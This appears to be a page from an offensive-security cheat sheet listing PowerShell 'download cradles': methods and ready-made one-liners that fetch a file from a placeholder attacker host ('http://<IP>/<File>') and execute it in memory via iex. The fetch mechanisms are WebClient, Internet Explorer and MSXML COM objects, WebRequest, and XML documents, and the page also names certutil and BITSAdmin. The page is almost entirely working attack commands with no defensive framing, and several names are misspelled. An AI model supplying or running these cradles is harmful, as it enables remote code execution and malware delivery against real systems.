Download and Execution Methods
Tools
https://github.com/danielbohannon/Invoke-CradleCrafter
In Memory
Net.WebClient DownloadString Method
Net.WebClient DownloadData Method
Net.WebClient OpenRead Method
.NET [Net.HttpWebReqest].class
Word.Application COM Object
Excel.Application COM Object
InternetExplorer.Application COM Object
MSXML2.ServerXmlHTTP Com Object
Certutil.exe w/ -ping argumentOn Disk
Net.WebClient DownloadFile Method
BITSAdmin.exe
Cerutil.exe w/ -urlcahche argumentNet.WebClient Download String Method
# Standard download cradle
iex (New-Object Net.Webclient).DownloadString("http://<IP>/<File>")
# Internet Explorer Downoad cradle
$ie=New-Object -ComObject
InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://<IP>/<File>
');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response
# Requires PowerShell V3+
iex (iwr 'http://<IP>/<File>')
$h=New-Object -ComObject
Msxml2.XMLHTTP;$h.open('GET','http://<IP>/<File>',$false);$h.send();iex
$h.responseText
$wr = [System.NET.WebRequest]::Create("http://<IP>/<File>")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()Net.WebClient Single Quotes Download and store
iex (new-Object Net.WebClient).DownloadFile('http://<IP>/<File>', 'C:\programdata\<File>')Net.WebClient User Agent Download
$downloader = New-Object System.Net.WebClient
$downloader.Headers.Add ("")
$payload = "http://<IP>/<File>"
$command = $downloader.DownloadString($payload)
iex $commandXML Download and execute.
$xmldoc = New-Object System.Xml.XmlDocument
$xmldoc.Load("http://<IP>/<File.xml>")
iex $xmldoc.command.a.executeOne Line
$xmldoc = New-Object System.Xml.XmlDocument ; $xmldoc.Load("http://<IP>/<File.xml>") ; iex $xmldoc.command.a.executeScript Example
<?xml version="1.0"?>
<command>
<a>
<execute>Get-Process</execute>
</a>
</command>Last updated